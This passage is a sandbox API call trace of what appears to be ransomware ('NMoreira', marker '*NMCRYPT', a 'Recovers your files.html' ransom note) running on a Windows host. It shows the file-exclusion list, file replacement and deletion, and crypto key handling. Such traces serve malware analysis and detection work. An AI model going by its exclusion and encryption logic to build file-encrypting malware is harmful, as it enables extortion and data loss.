(pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat") returned 1 [0145.229] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat")) returned 0 [0145.229] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" [0145.229] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0145.229] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXAA27.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxaa27.tmp")) returned 0xaa27 [0145.230] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXAA27.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxaa27.tmp"), dwFlags=0x1) returned 0 [0145.230] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXAA27.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxaa27.tmp")) returned 1 [0145.230] CryptDestroyKey (hKey=0x9ad178) returned 1 [0145.230] wcslen (_String="OK") returned 0x2 [0145.230] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0145.230] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0145.230] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0145.230] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0145.230] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0145.230] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0145.230] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*NMCRYPT") returned 0 [0145.230] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*Recovers your files.html") returned 0 [0145.230] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*.exe") returned 0 [0145.230] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*.dll") returned 0 [0145.230] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*.lnk") returned 0 [0145.230] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*.bat") returned 0 [0145.230] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*.ini") returned 0 [0145.230] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*.msi") returned 0 [0145.230] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*.scf") returned 0 [0145.230] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*pagefile.sys*") returned 0 [0145.230] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*NTUSER.DAT*") returned 0 [0145.230] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*AppData*") returned 0 [0145.230] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*\\winrar\\*") returned 0 [0145.231] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*\\Internet Explorer\\*") returned 0 [0145.231] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*\\java\\*") returned 0 [0145.231] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*\\TeamViewer\\*") returned 0 [0145.231] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*\\windows\\*") returned 0 [0145.231] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*\\ESET\\*") returned 0 [0145.231] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*\\AVG\\*") returned 0 [0145.231] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*\\AVIRA\\*") returned 0 [0145.231] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*\\AVAST Software\\*") returned 0 [0145.231] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*Atheros*") returned 0 [0145.231] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*Realtek*") returned 0 [0145.231] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*bootmgr*") returned 0 [0145.231] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*boot*") returned 0 [0145.231] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*boot*") returned 0 [0145.231] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*CONFIG.SYS*") returned 0 [0145.231] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*IO.SYS*") returned 0 [0145.231] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*MSDOS.SYS*") returned 0 [0145.231] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*NTDETECT.COM*") returned 0 [0145.231] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*ntldr*") returned 0 [0145.231] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*chrome*") returned 0 [0145.231] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*opera*") returned 0 [0145.231] PathMatchSpecW (pszFile="hwrusash.dat", pszSpec="*firefox*") returned 0 [0145.231] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat", pszSpec="*") returned 1 [0145.231] strlen (_Str="NMoreira") returned 0x8 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: 